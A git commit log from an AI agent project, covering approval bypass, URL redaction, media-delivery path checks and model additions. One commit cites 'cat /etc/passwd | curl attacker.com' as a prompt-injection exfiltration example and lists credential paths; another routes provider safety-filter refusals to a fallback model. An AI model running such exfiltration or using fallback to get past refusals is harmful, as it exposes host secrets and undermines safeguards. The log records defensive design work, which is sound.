Dispatch uses signature inspection (`_provider_sync_accepts_messages`): only
providers that declare a `messages` parameter (or `**kwargs`) receive it; all
existing in-tree providers keep their legacy text-only signature and are
called unchanged. No structured-trace envelope is added to core — providers
reconstruct whatever they need from the standard message list.

Also documents Memori as a standalone community memory provider.

Salvaged from #28065 — rebased onto current main.

Co-authored-by: Dave Heritage <david@memorilabs.ai>
2026-05-29 02:16:43 +05:30
Austin Pickett 0acb7f4583 fix(nix): update hermes-web npmDepsHash for @nous-research/ui 0.18.2
The web/package-lock.json changed when bumping @nous-research/ui to
0.18.2, so the fetchNpmDeps fixed-output hash in nix/web.nix was stale.
Update it to the hash prefetch-npm-deps computes for the new lockfile.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 16:24:01 -04:00
Austin Pickett a3cd974ee7 chore(web): bump @nous-research/ui to 0.18.2
Picks up the deferred GPU-tier detection fix (design-language) that
stops the synchronous WebGL probe from blocking first paint, which was
causing a boot-time flash in the dashboard backdrop.

nix/web.nix npmDepsHash is a placeholder here and is corrected in the
follow-up commit using the hash reported by the Nix CI job.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 16:20:14 -04:00
Teknium ea5a6c216b ci(deploy): allow workflow_dispatch to also trigger Vercel deploy (#34081)
Today's three skills-index PRs (#33748, #33809, #34025) merged to main
but the live Vercel-hosted docs site didn't pick them up — Vercel is
fired by the deploy-vercel job, which was gated on release events only.
Out-of-band main commits between releases couldn't reach Vercel without
cutting a tag.

Widen the gate to also include workflow_dispatch so 'gh workflow run
deploy-site.yml' can ship pending main changes to Vercel on demand.
Release-tag behavior is unchanged.
2026-05-28 13:17:58 -07:00
kshitijk4poor 4df62d239e docs(hindsight): correct recall_types scope — tool path is also narrowed
The original change's description and README claimed the per-call
hindsight_recall tool was unaffected by the new observation-only default.
That is inaccurate: hindsight_recall reads the same self._recall_types
instance attribute as the auto-recall prefetch path, and RECALL_SCHEMA
exposes no per-call types argument, so the model cannot override it.
Narrowing the default narrows BOTH paths.

Corrects the README behavior-change note, the config-table row, and the
get_config_schema description to reflect that recall_types applies to
both auto-recall and the hindsight_recall tool.
2026-05-28 13:07:20 -07:00
Nicolò Boschi 490b3e76b1 feat(hindsight): default recall_types to observation only
Auto-recall used to surface every fact type Hindsight had on the
session — `world`, `experience`, and `observation`. That triple-ships
the same underlying signal in three different framings: observations
are the concrete events the user said/did/asked, while world and
experience facts are aggregate summaries Hindsight derives from those
exact observations. Including all three burns most of
`recall_max_tokens` on rephrasings, crowds out events the model
actually needs to see, and produces effective duplicates in the
prompt — observations themselves are deduplicated by construction
so observation-only recall is denser per token and closer to
conversational ground truth.

Change
------
- Default `_recall_types = ["observation"]` (was `None`, which
  delegated to server-side "return everything").
- `initialize()` now treats a missing `recall_types` config the same
  way; also accepts comma-separated strings for parity with `recall_tags`.
- An explicit `recall_types=[]` config falls back to the default rather
  than disabling the filter (would silently widen recall vs. the new
  default).
- Added to `get_config_schema()` so it's discoverable via `hermes config`.

Per-call `hindsight_recall` tool invocations are unaffected — they
already only forward `types` when the caller passes the argument.

Docs / migration
----------------
plugins/memory/hindsight/README.md grows a "Behavior change" callout
explaining the why (no-duplicates, information-efficient) and how to
restore the legacy broad recall:

    "recall_types": "observation,world,experience"   # or a JSON list

in `~/.hermes/hindsight/config.json`.

Tests
-----
- `test_default_values` updated for the new default.
- New cases: explicit list override, CSV string accepted, empty list
  falls back to default (not "wider than default").
2026-05-28 13:07:20 -07:00
teknium1 321ce94e25 test: update non-minimax overflow test to match new keep-context behavior
The old test asserted that a non-MiniMax provider returning a generic
overflow (no provider-reported max) would step down to the 128K probe
tier. The salvaged fix from #33673 deliberately removes that step-down
because guessed tiers cause configured 1M sessions to silently shrink.

Update the test to assert the new contract: keep the configured 200K
window and rely on compression instead.
2026-05-28 12:26:53 -07:00
teknium1 c5e496e1c0 chore: map yanghongda@jackyun.com -> yangguangjin in AUTHOR_MAP 2026-05-28 12:26:53 -07:00
yanghd 7a3c38d0b7 fix: stop probe stepdown without provider context limit 2026-05-28 12:26:53 -07:00
kshitijk4poor 5cbc3fbdcc fix(cli): /yolo in chat must enable session bypass, not just set env var
The CLI's in-chat `/yolo` toggle mutated `os.environ["HERMES_YOLO_MODE"]`
but had no effect because `tools/approval.py:_YOLO_MODE_FROZEN` captures
that env var once at module-import time (a deliberate security floor that
keeps prompt-injected skills from flipping the bypass mid-run). By the
time the user reaches `/yolo` in a running CLI session, `tools.approval`
has already been imported, so the env flip after that is a silent no-op.

Result: `/yolo` advertised "⚠ YOLO" in the status bar while every
dangerous command still hit the approval prompt or got denied.  Only
`hermes --yolo` (set before tool imports), `HERMES_YOLO_MODE=1 hermes ...`,
and `hermes config set approvals.mode off` actually bypassed.

This patches the CLI to match what the gateway and TUI `/yolo` handlers
already do, plus mirrors the TUI's session-rename YOLO transfer:

* `_toggle_yolo()` now calls `enable_session_yolo(self.session_id)` /
  `disable_session_yolo(self.session_id)` instead of touching the env
  var.  Matches `gateway/run.py:_handle_yolo_command` and the
  `tui_gateway/server.py` key=="yolo" branch.
* Around each `run_conversation()` call, `run_agent()` now binds
  `set_current_session_key(self.session_id)` so
  `tools.approval.is_current_session_yolo_enabled()` resolves against
  the same key the toggle writes under, and resets it in `finally` so
  reused threads don't see stale identity.  Matches the
  `tui_gateway/server.py` and `gateway/platforms/api_server.py` binding
  pattern.
* New `_transfer_session_yolo()` helper carries YOLO bypass state
  across `self.session_id` reassignments — `/branch` forking into a
  new session id and the auto-compression sync that rotates into a
  fresh continuation session id.  Without this, the same UX failure
  mode the rest of this fix addresses (silent `/yolo` no-op) would
  reappear after a single `/branch` or auto-compression event.
  Mirrors `tui_gateway/server.py` ~line 1297-1305.
* New `_is_session_yolo_active()` helper replaces the two
  `bool(os.getenv("HERMES_YOLO_MODE"))` reads in the status-bar
  builders, so the badge reflects the actual bypass state.  Uses
  `getattr(self, "session_id", None)` so status-bar test fixtures
  that bypass `__init__` via `HermesCLI.__new__(HermesCLI)` don't
  trip `AttributeError` (the builders swallow exceptions silently
  and lose every field after the failure).  Still honors
  `_YOLO_MODE_FROZEN` so `hermes --yolo` keeps lighting it up.

The `_YOLO_MODE_FROZEN` security freeze is preserved — env-var-based
opt-in still only works when set before process start, which is the
documented contract for `--yolo` / `HERMES_YOLO_MODE`.

Closes #33925
2026-05-28 12:10:21 -07:00
teknium1 f30db14ced fix(kanban): SIGTERM on worker must terminate the process (#28181)
The single-query signal handler in cli.py raises KeyboardInterrupt on
SIGTERM/SIGHUP. For interactive 'hermes chat -q' that unwinds the main
thread cleanly. For kanban workers spawned by the dispatcher, the
worker process is likely to have a non-daemon thread alive (terminal
_wait_for_process, custom plugins, etc.). With KeyboardInterrupt only
the main thread unwinds; the non-daemon thread keeps the process alive,
the gateway has already restarted, and the dispatcher's _pid_alive
check returns True forever — task stuck in 'running' indefinitely.

When HERMES_KANBAN_TASK is set (dispatcher-spawned worker), flush
logging + stdout/stderr, then os._exit(0) instead of raising
KeyboardInterrupt. The kernel reclaims the PID immediately, and the
existing zombie-state detection in _pid_alive flips the task to
crashed on the next dispatcher tick. detect_crashed_workers then
re-spawns it on the following tick — no manual recovery needed.

A SIGALRM(2s) deadman is armed before the flush so a pathological
blocking-I/O flush can't wedge the worker forever. In practice the
reporter measured flush in <1ms; the alarm is a failsafe, never
the common path.

Interactive (non-kanban) chat -q is unchanged — the env-gated branch
only fires for dispatcher-spawned workers.

Live verification on this machine:
- Without HERMES_KANBAN_TASK + non-daemon thread alive: process hangs
  alive 4+ seconds after SIGTERM. Dispatcher's _pid_alive returns
  True → task stuck.
- With HERMES_KANBAN_TASK + same non-daemon thread: process exits in
  0.10s via os._exit(0). Dispatcher reclaims on next tick.

Tests:
- tests/hermes_cli/test_signal_handler_kanban_worker.py (3 cases):
  end-to-end subprocess test with a non-daemon thread,
  HERMES_KANBAN_TASK env, SIGTERM, dispatcher-style _pid_alive check.
  Plus a source-level invariant test catching future refactors that
  drop the env-gated exit.
- 452/452 kanban tests pass.

Co-authored-by: andrewhosf <andrewho.sf@gmail.com>
2026-05-28 11:59:58 -07:00
Teknium 3a9bc9d88a fix(model picker): unify /model and hermes model lists, add disk cache (#33867)
* fix(model picker): unify /model and `hermes model` model lists, add disk cache

The /model slash picker and `hermes model` were drifting apart. /model
read the raw static `OPENROUTER_MODELS` list (31 entries, including 5
that fail at runtime — no tool-call support or absent from live catalog),
while `hermes model` ran the same list through the live OpenRouter
/v1/models tool-support filter and showed 26 valid entries. Same problem
existed for every other authed provider: /model used curated static
lists, `hermes model` used live /v1/models.

Unifies both surfaces on `provider_model_ids()` and adds a generic
disk-cached wrapper so the picker stays snappy.

Changes
- hermes_cli/models.py: new `cached_provider_model_ids()` —
  ~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries
  keyed by credential fingerprint (env vars + OAuth file mtimes).
  Stale-data-beats-no-data on transient failures. Pair with
  `clear_provider_models_cache(provider=None)`.
- hermes_cli/models.py: `provider_model_ids("nous")` now falls back
  to the docs-hosted manifest (not the in-repo snapshot) when the live
  Portal /models call fails — preserves the model_catalog regression
  guarantee while still going through the unified pathway.
- hermes_cli/model_switch.py: `list_authenticated_providers` routes
  sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with
  curated fallback when the live fetcher comes up empty.
- hermes_cli/model_switch.py: `parse_model_flags` extended to a
  4-tuple, parses `--refresh`.
- cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking;
  CLI + gateway wire `--refresh` to `clear_provider_models_cache()`.
- hermes_cli/main.py: `hermes model --refresh` argparse flag.
- hermes_cli/commands.py: `/model` args_hint advertises `--refresh`.
- tests/hermes_cli/test_inventory.py: refresh stale comment.

Live PTY parity verification
- /model → OpenRouter row: `(26 models)` (was 31, with broken entries)
- `hermes model` → OpenRouter: 26 models (unchanged)
- The 5 dropped entries: `pareto-code` (no tool-call support),
  `gemini-3-pro-image-preview` (no tool-call support),
  `elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone
  from OpenRouter's live catalog).

Live PTY timing
- First /model open, empty cache: 4624 ms (full network round trip
  across every authed provider)
- Second /model open, warm cache: 51 ms (90× faster)
- `/model --refresh` clears the disk cache and re-fetches.

Cache schema (~/.hermes/provider_models_cache.json, ~3 KB):
  { "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]},
    ... }

Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway —
5855/5855 pass.

* fix(model picker): use blake2b for cache fingerprint to silence CodeQL

py/weak-sensitive-data-hashing flagged the sha256 call in
_credential_fingerprint() as a high-severity alert because the input
includes env var values whose names contain *_API_KEY / *_TOKEN.

The hash is used solely as a cache-bust identity — never reversed, never
stored, collisions are harmless (worst case: cache miss → live re-fetch).
blake2b serves the same purpose and isn't flagged by this rule.

Functional behavior identical: 16-hex-char digest, cache hit/miss logic
unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms.
2026-05-28 11:33:16 -07:00
Teknium 5f66c36470 fix(redact): pass web URLs through unchanged (#34029)
* fix(redact): pass web URLs through unchanged

Magic-link checkout URLs, OAuth callbacks the agent is meant to follow,
and pre-signed share URLs were getting `?token=***` / `?code=***` /
`?signature=***` blanket-redacted by parameter NAME, which breaks any
skill that has to round-trip a URL through history (the model's tool
call arguments get sanitized before persistence — the live call fires
with the real URL, but the next turn sees `***`).

Joe Rinaldi Johnson hit this with a checkout-acceleration skill that
uses magic links in URLs.

Drops three call sites from `redact_sensitive_text`:
- `_redact_url_query_params` (was redacting `access_token`, `token`,
  `api_key`, `code`, `signature`, `key`, `auth`, etc.)
- `_redact_url_userinfo` (was redacting `https://user:pass@host`)
- `_redact_http_request_target_query_params` (was redacting access-log
  request targets like `"POST /hook?password=... HTTP/1.1"`)

The helpers themselves are kept in the module — still importable by
anything that wants to opt in explicitly.

Still redacted (unchanged):
- Vendor-prefix credential shapes (sk-, ghp_, AKIA, gAAAA, etc.)
  anywhere they appear, including inside URLs — see the
  `test_known_prefix_inside_url_still_redacted` case.
- JWTs (`eyJ...`)
- DB connection-string passwords (`postgres://admin:pw@host`) —
  these are connection strings, not web URLs the agent navigates to.
- Authorization headers, ENV assignments, JSON `apiKey`/`token` fields,
  Telegram bot tokens, private key blocks, Discord mentions, E.164
  phone numbers, and form-urlencoded bodies (request bodies, not URLs).

Tests: replaces `TestUrlQueryParamRedaction` + `TestUrlUserinfoRedaction`
with `TestWebUrlsNotRedacted`, asserting representative URLs (OAuth
callback, magic link, S3 pre-signed, websocket, userinfo, access log)
pass through unchanged. Adds positive cases proving the prefix and DB
connstr nets still fire. 74 redact tests + 10 browser-exfil + 16 PII
redaction tests all pass.

* test(codex_app_server): drop URL-query assertion from stderr-tail redaction test

The test bundled (a) sk-live-* credential-prefix redaction with (b)
URL query-param redaction. (a) is still in effect via _PREFIX_RE;
(b) was the contract we just removed in the parent commit so the
'querysecret12345' assertion stopped holding. Keep the credential-shape
assertion, drop the URL-query one.

Send-message tool's local _URL_SECRET_QUERY_RE in tools/send_message_tool.py
is independent of agent/redact.py and unchanged — its tests
(test_top_level_send_failure_redacts_query_token,
test_http_error_redacts_access_token_in_exception_text) still pass.
2026-05-28 11:32:39 -07:00
Teknium 7a8589e782 fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022)
PR #29523 restricted MEDIA: paths and bare local paths in agent output to
files under the Hermes media cache or an operator-allowlisted root, with
a 10-minute recency window as a fallback. The intent was to defend
against prompt-injection-driven exfiltration of host secrets, but in the
default single-user setup the asymmetry doesn't earn its keep: we accept
any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...)
and the agent already has terminal access — anything that can convince
it to emit a MEDIA: tag for /etc/passwd can equally convince it to
`cat /etc/passwd | curl attacker.com`.

Practical breakage: agents that produced an .md, .pdf, or other
artifact more than ~10 minutes ago, or outside the cache allowlist,
showed the user a raw filepath in chat instead of the file.

Default flipped to denylist-only:
  • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run}
  • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud}
  • macOS Library/Keychains
  • $HERMES_HOME/{.env, auth.json, credentials}

The legacy allowlist+recency-window behavior stays available via
opt-in: `gateway.strict: true` in config.yaml (or
`HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots
where prompt injection from one user shouldn't be able to exfiltrate
the host's secrets to that same user.

• `gateway/platforms/base.py` — `validate_media_delivery_path()`
  short-circuits to "return resolved if not under denylist" when
  strict is off. Strict mode preserves the original cache-then-
  allowlist-then-recency logic. New `_media_delivery_strict_mode()`
  reader for `HERMES_MEDIA_DELIVERY_STRICT`.
• `hermes_cli/config.py` — `gateway.strict: false` added to
  DEFAULT_CONFIG; existing keys documented as "only consulted in
  strict mode." No `_config_version` bump needed (deep-merge picks
  up the new default for old installs).
• `gateway/run.py` — bridges `gateway.strict` →
  `HERMES_MEDIA_DELIVERY_STRICT` at startup.
• `tools/send_message_tool.py` — schema description broadened back
  to plain "any local path."
• Tests — existing strict-path tests pinned to STRICT=1 so they keep
  exercising the legacy behavior; new `TestMediaDeliveryDefaultMode`
  with 8 cases covering the public default (stale .md accepted, any
  extension delivers, credential paths still blocked, strict env-var
  aliases, filter E2E).

Validation:
  - tests/gateway/test_platform_base.py: 119/119 pass
  - tests/gateway/test_tts_media_routing.py: 7/7 pass
  - tests/tools/test_send_message_tool.py: 121/121 pass
  - tests/hermes_cli/test_kanban_notify.py: 12/12 pass
  - tests/cron/test_scheduler.py: 120/120 pass
  - E2E via execute_code with real imports:
    • stale .md outside allowlist → accepted (default)
    • same path with STRICT=1 → rejected
    • $HOME/.ssh/id_rsa → rejected (default)
    • filter_local_delivery_paths([md, key]) → [md] only
    • gateway.strict in config.yaml → bridged to env (true=1, false=0)
2026-05-28 11:32:36 -07:00
Teknium 7050c052e3 fix(skills): pull full skills.sh catalog via sitemap (858 → 19,932) (#34025)
The skills.sh source was returning ~858 unique skills from a hardcoded
list of 28 popular keyword searches (each capped at 50 results). The
real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from
the site's sitemap index.

Switch the empty-query path in SkillsShSource.search() to walk the
sitemap instead of scraping the homepage's curated featured strip.
Falls back to the homepage scrape if the sitemap is unreachable.

build_skills_index.crawl_skills_sh() now just calls search("", limit=0)
instead of running 28 keyword searches — same result in one HTTP round
instead of 28.

Also handle a httpx + brotlicffi interaction: the per-skill sitemaps
are ~900 KB brotli-compressed and the cffi backend's streaming decode
chokes on them. Forcing Accept-Encoding to gzip dodges the bug without
requiring a brotli library upgrade.

E2E against live skills.sh: 19,932 unique skills walked in 0.7s.
Tests: 137 pass (+1 new regression test exercising the sitemap path).

Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future
regression hard-fails the build.
2026-05-28 11:28:12 -07:00
Austin Pickett 102eb4adc0 fix(nix): update hermes-web npmDepsHash for bumped @nous-research/ui
The web/package-lock.json changed when bumping @nous-research/ui to 0.18.0,
so the fetchNpmDeps fixed-output hash in nix/web.nix was stale and the nix
build failed. Update it to the hash prefetch-npm-deps computes for the new
lockfile.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 14:27:08 -04:00
Teknium b1d3ead7fb docs: tweak v0.15.0 release notes (#34037) 2026-05-28 11:20:52 -07:00
Austin Pickett c661fefa08 Merge remote-tracking branch 'origin/main' into refactor/use-ds-primitives
Co-authored-by: Cursor <cursoragent@cursor.com>

# Conflicts:
#	web/src/components/BottomPickSheet.tsx
#	web/src/components/SidebarFooter.tsx
#	web/src/components/ui/card.tsx
#	web/src/components/ui/confirm-dialog.tsx
#	web/src/pages/ChatPage.tsx
2026-05-28 14:20:49 -04:00
Teknium fe5c8ec4ad fix(dashboard): auto-reload SPA on stale-token 401 in loopback mode (#33861)
The dashboard's loopback auth uses an ephemeral '_SESSION_TOKEN' that
rotates on every server restart (hermes update, hermes gateway restart,
etc.). A tab kept open across the restart holds the OLD token in
window.__HERMES_SESSION_TOKEN__ from the previous HTML render, so every
'/api/*' fetch returns '401 Unauthorized' — surfacing in the UI as
'Failed to load Kanban board: 401: Unauthorized', 'Analytics 401', etc.
(#24186, #25275).

Before this patch the workaround was to manually clear site data or
hard-reload — annoying enough that users reported it as a regression
even though the token rotation is by design (security property:
stolen tokens can't survive a server restart).

The HTML response already sets 'Cache-Control: no-store, no-cache,
must-revalidate', so a reload reliably picks up the freshly-injected
token. fetchJSON now triggers that reload automatically on the first
loopback-mode 401, guarded by a sessionStorage flag so a genuine
auth bug (where even the new token fails) falls through to throw
on the second attempt instead of reload-looping. The flag is
cleared on any 2xx so a subsequent server restart in the same tab
gets its own reload cycle.

Gated mode is unaffected — that path already redirects to login_url
via the structured 401 envelope (Phase 6), and the new code is
explicitly skipped when window.__HERMES_AUTH_REQUIRED__ is set.

Refs #24186, #25275
2026-05-28 10:53:23 -07:00
Teknium 0c859a1c04 chore: release v0.15.0 (2026.5.28) (#34008)
* chore: release v0.15.0 (2026.5.28)

The Velocity Release. Run_agent.py refactor (16k→3.8k LOC, -76%),
kanban grows into a multi-agent platform (104 PRs), cold-start perf wave
continues (-240ms / -47% per-turn function calls / -195ms per tool call),
session_search rebuilt (4500x faster, no LLM), promptware defense lands,
Bitwarden Secrets Manager integration, two new image_gen providers
(Krea 2, FAL plugin port), Nous-approved MCP catalog, OpenHands skill,
ntfy as 23rd messaging platform, deep xAI integration round.
15 P0 + 65 P1 closures. 747 PRs, 1,302 commits, 321 contributors.

* chore(release): bump acp_registry/agent.json to 0.15.0 (sync with pyproject)
2026-05-28 10:45:33 -07:00
kshitij 1a74795735 feat: add claude-opus-4.8 and claude-opus-4.8-fast (#34003)
Anthropic released Claude Opus 4.8 on 2026-05-27, available on
OpenRouter, Anthropic, Amazon Bedrock, and Claude Platform on AWS:
  - https://openrouter.ai/anthropic/claude-opus-4.8
  - https://openrouter.ai/anthropic/claude-opus-4.8-fast

The fast-mode variant is a separate model ID (anthropic/claude-opus-4.8-fast)
priced at 2x of the base model — a notable improvement over the 6x premium
on older Opus generations (4.6/4.7). It is NOT a `speed: "fast"` request
parameter like Opus 4.6; Anthropic's native fast-mode beta still only
covers Opus 4.6.

Changes:

  hermes_cli/models.py
    - Add anthropic/claude-opus-4.8 + anthropic/claude-opus-4.8-fast to
      the OpenRouter fallback snapshot and the Nous Portal curated list
      (live catalogs surface them automatically when reachable; the
      fallback list matters when the manifest fetch fails).
    - Add claude-opus-4-8 to the Anthropic-native picker list.

  agent/model_metadata.py
    - Register claude-opus-4-8 / claude-opus-4.8 in DEFAULT_CONTEXT_LENGTHS
      with 1M tokens (matches 4.6/4.7).

  agent/anthropic_adapter.py
    - Extend _XHIGH_EFFORT_SUBSTRINGS, _ADAPTIVE_THINKING_SUBSTRINGS, and
      _NO_SAMPLING_PARAMS_SUBSTRINGS with "4-8"/"4.8". 4.8 inherits the
      Opus 4.7 API contract: adaptive thinking only, xhigh effort level
      supported, sampling parameters (temperature/top_p/top_k) return 400.
    - Add claude-opus-4-8 to _ANTHROPIC_OUTPUT_LIMITS (128k max output,
      same as 4.7). Matches by substring so claude-opus-4-8-fast and
      date-stamped variants resolve correctly.

  agent/usage_pricing.py
    - Add anthropic/claude-opus-4-8: $5/$25 per MTok input/output, $0.50
      cache read, $6.25 cache write (same as 4.6/4.7).
    - Add anthropic/claude-opus-4-8-fast: $10/$50 per MTok (2x), $1.00
      cache read, $12.50 cache write. Per OpenRouter, the 2x premium is
      the only differentiator from regular Opus 4.8.
    - OpenRouter routes still pull pricing from the live /models API, so
      no static OpenRouter entry is needed.

  tests/agent/test_model_metadata.py
    - Extend the Claude 4.6+ context-length tag list with 4.8/4-8.

  website/static/api/model-catalog.json
    - Regenerated via `python scripts/build_model_catalog.py` to pick up
      the new entries in the OpenRouter and Nous Portal fallback lists.

E2E verification (isolated sys.path import against the worktree):
  - _supports_adaptive_thinking, _supports_xhigh_effort, _forbids_sampling_params
    all return True for claude-opus-4.8 and claude-opus-4.8-fast.
  - _supports_fast_mode (the `speed: "fast"` request-parameter gate) stays
    False for 4.8 — fast mode is a separate model ID on OpenRouter, not a
    parameter Anthropic accepts on the base model.
  - DEFAULT_CONTEXT_LENGTHS resolves 1M for both notations.
  - resolve_billing_route + _lookup_official_docs_pricing resolve the
    correct $5/$25 (regular) and $10/$50 (fast) pricing for both
    dot-notation and dash-notation inputs.
  - 4.7 and 4.6 regression: behavior unchanged.

Unit tests: 305 passed across tests/agent/test_usage_pricing.py,
test_model_metadata.py, tests/hermes_cli/test_model_catalog.py,
test_models.py, test_model_validation.py, test_models_dev_preferred_merge.py.
2026-05-28 10:31:59 -07:00
Ben Heidorn e8b9369a9d feat(openrouter): pass session_id in extra_body for sticky routing
OpenRouter supports a session_id field in extra_body that pins
multi-turn conversations to the same provider endpoint, enabling
prompt cache reuse across turns. The session_id was already threaded
through to build_extra_body() but never included in the returned dict.

Co-Authored-By: Claude Opus 4 (1M context) <noreply@anthropic.com>
2026-05-28 08:52:19 -07:00
kshitij 0554ef1aa3 fix(agent): fallback immediately on provider content-policy blocks (#33883)
* fix(agent): fallback immediately on provider content-policy blocks

Provider safety-filter refusals (e.g. OpenAI Codex 'flagged for possible
cybersecurity risk', OpenAI moderation 'violates our usage policies',
Anthropic safety-system rejections, Azure content_filter) are
deterministic decisions about a specific prompt. Retrying the same
prompt up to api_max_retries times just reproduces the same refusal and
burns paid attempts before surfacing the generic 'API failed after 3
retries — <provider message>' to Telegram / cron with no indication that
the failure came from the model provider rather than Hermes itself.

Classify these as a new FailoverReason.content_policy_blocked
(non-retryable, should_fallback=True) and route them through the
existing is_client_error path so the loop:
  - skips the 3x retry backoff
  - activates a configured fallback model immediately
  - emits a clear provider-safety message to the user (not the generic
    'Non-retryable error (HTTP None)') and surfaces actionable guidance
    when no fallback is configured (rephrase, narrow context, or set
    fallback_model in hermes config)
  - returns a final_response that explicitly tells the user this came
    from the model provider, so gateway delivery is unambiguous and
    cron last_status reflects the safety block rather than a vague
    'agent reported failure'

Patterns are intentionally narrow — verbatim refusal phrasings keyed to
specific provider safety pipelines, not generic words like 'policy' or
'violation' that would collide with billing / format / auth errors.
Regression guards in test_18028_content_policy_blocked.py verify
billing 402s, generic 400s, and OpenRouter account-level
provider_policy_blocked remain distinct classifications.

Salvaged from #18164 onto current main (file restructure: loop logic
moved from run_agent.py to agent/conversation_loop.py, _emit_status →
_buffer_status), broadened patterns beyond the original OpenAI Codex
cybersecurity case to cover OpenAI moderation, Anthropic safety system,
and Azure content_filter; added user-actionable guidance and a clear
final_response so cron/gateway surfaces the policy block instead of a
generic non-retryable error, and added a regression-guard test module
mirroring the is_client_error predicate.

Addresses #18028.

Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com>

* chore: add kchuang1015 to AUTHOR_MAP

---------

Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com>
2026-05-28 07:28:24 -07:00
kshitij a82c88bac0 fix(xai-oauth): accept bare-code manual paste (state=None) (#26923) (#33880)
xAI's consent page renders the authorization code in-page rather than
redirecting through the 127.0.0.1 callback, so on remote/headless setups
(GCP Cloud Shell, Codespaces, container consoles, headless VPS) the only
value the user can paste is the opaque code with no `code=`/`state=`
query parameters. `_parse_pasted_callback` correctly returns
`state=None` for that input, but `_xai_oauth_loopback_login` then
validated state unconditionally and raised `xai_state_mismatch`,
making the documented bare-code paste path unreachable.

PKCE (code_verifier) still binds the token exchange to this client,
so the local state-equality check is redundant when there is no state
to compare. On the manual-paste path only, substitute the locally
generated state when the callback returned none — the rest of the
validation chain (code presence, error field, token exchange) is
unchanged. The loopback HTTP-server path still requires a matching
state (a real browser redirect always carries one).

Also: clarify the manual-paste prompt to mention xAI's in-page code
rendering so users know pasting the bare code on its own is expected.

Root-cause analysis from #26923 comment by @AccursedGalaxy (2026-05-20).

Tests
-----
* test_xai_loopback_login_manual_paste_bare_code_succeeds — positive
  end-to-end through the token exchange with state=None.
* test_xai_loopback_login_loopback_path_rejects_missing_state — the
  HTTP-server path still rejects state=None as a regression guard
  (the bare-code relaxation must NOT widen the loopback path).
* Existing test_xai_loopback_login_manual_paste_state_mismatch_raises
  continues to verify wrong (non-None) state is rejected on manual-paste.

Closes #26923.
2026-05-28 05:47:30 -07:00
helix4u c0d04694ea docs(email): clarify gateway vs Himalaya setup 2026-05-28 05:42:09 -07:00
Teknium 67011cc0d7 feat(agent): buffer retry/fallback status, surface only on terminal failure (#33816)
Users report that the CLI/gateway floods them with confusing retry chatter
during transient failures: a single 429 can produce 10+ "Provider/Endpoint/
Retrying in 5s..." lines before the request eventually succeeds. The same
firehose hits Telegram, Discord, Slack, etc. via _emit_status.

This patch defers all retry/fallback/compression status messages until we
know the outcome:
  - if the turn ultimately succeeds (any path: primary recovers, fallback
    activates, compression unsticks the request), the buffer is silently
    dropped — the user sees nothing.
  - if every retry and fallback exhausts and the turn fails, the buffer
    is flushed at the terminal-failure return so the user sees the full
    retry trace alongside the final error.

Backend logging (agent.log) is unchanged — every emission site still
writes to logger.warning/info, so post-mortem diagnosis is intact.

## What changed

run_agent.py: four new methods on AIAgent:
  _buffer_status(msg)   — defer an _emit_status call
  _buffer_vprint(msg)   — defer a _vprint(force=True) line
  _clear_status_buffer() — drop pending messages on success
  _flush_status_buffer() — replay pending messages on terminal failure

agent/conversation_loop.py:
  - converted ~30 mid-process emit/vprint sites in the retry, fallback,
    compression, empty-response, and stream-watchdog paths to the buffered
    helpers
  - added _flush_status_buffer() at every terminal-failure return so users
    still see the trace when it actually matters
  - added _clear_status_buffer() at the "non-empty assistant content"
    point (NOT at "API call returned bytes" — empty responses still loop
    through the empty-retry path and would otherwise lose their trace
    between iterations)
  - silenced the two "(´;ω;`) oops, retrying..." / "(╥_╥) error,
    retrying..." spinner final-frame messages — the spinner now stops
    cleanly so retries leave no visible residue

agent/chat_completion_helpers.py: same conversion for codex TTFB / stale-
stream / fallback-activation status messages.

agent/stream_diag.py: _emit_stream_drop now buffers instead of emitting
directly.

## Tests

tests/run_agent/test_retry_status_buffer.py: 7 unit tests covering
accumulate→flush, clear-on-success, mixed kinds, empty-buffer no-op,
re-buffer after flush, exception swallowing.

Updated 3 existing tests that mocked _emit_status to also mock (or use)
_buffer_status:
  - tests/run_agent/test_run_agent.py::test_empty_response_emits_status_for_gateway
  - tests/run_agent/test_stream_drop_logging.py (2 tests)
  - tests/agent/test_codex_ttfb_watchdog.py (TTFB hint test)

## Validation

Live test: hermes chat -q against an unreachable endpoint with no fallback
exhausts retries and prints the full trace at the end. Same flow against
a working endpoint prints zero retry chatter.
2026-05-28 04:53:27 -07:00
Teknium e0572a6def fix(skills-hub): stop ellipsis-truncating the Identifier column (#33810)
`hermes skills search` rendered the Identifier column with the default
overflow behaviour, so long slugs (notably browse-sh — every browse-sh
skill ends in a `-XXXXXX` hash that's part of the identifier) were cut
to `browse-sh/weathe…`. Users copied the visible string into
`hermes skills install` and got a not-found error because the hash was
gone.

Set overflow="fold" on the Identifier column in both search tables
(`do_search` and the `_resolve_short_name` multi-match table) so long
slugs wrap onto a second line instead of getting eaten. Also add a
`--json` flag to `hermes skills search` (and the `/skills search`
slash variant) for scripting — emits a list of {name, identifier,
source, trust_level, description} objects with the full identifier,
which is the right shape for copy-paste pipelines too.

Closes #33674.
2026-05-28 04:53:13 -07:00
Teknium 5e1f793430 chore(web): remove web_crawl tool + provider crawl plumbing (#33824)
The web_crawl_tool() function was an orphan — no model schema registered
it, no skill or CLI command called it, and the agent had no way to invoke
it. PR #32608 proposed wiring it up as a model-callable tool; we've
decided not to expose crawl as a separate capability since web_search +
web_extract cover the use cases we want models to have.

Removed:
- tools/web_tools.py: web_crawl_tool() (~230 LOC)
